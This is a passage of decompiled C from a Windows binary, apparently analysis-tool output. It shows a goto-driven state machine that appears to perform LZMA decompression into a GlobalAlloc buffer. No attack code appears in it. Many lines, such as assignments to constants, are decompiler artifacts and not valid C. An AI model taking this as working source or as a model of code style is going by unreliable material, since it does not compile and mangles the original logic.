													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
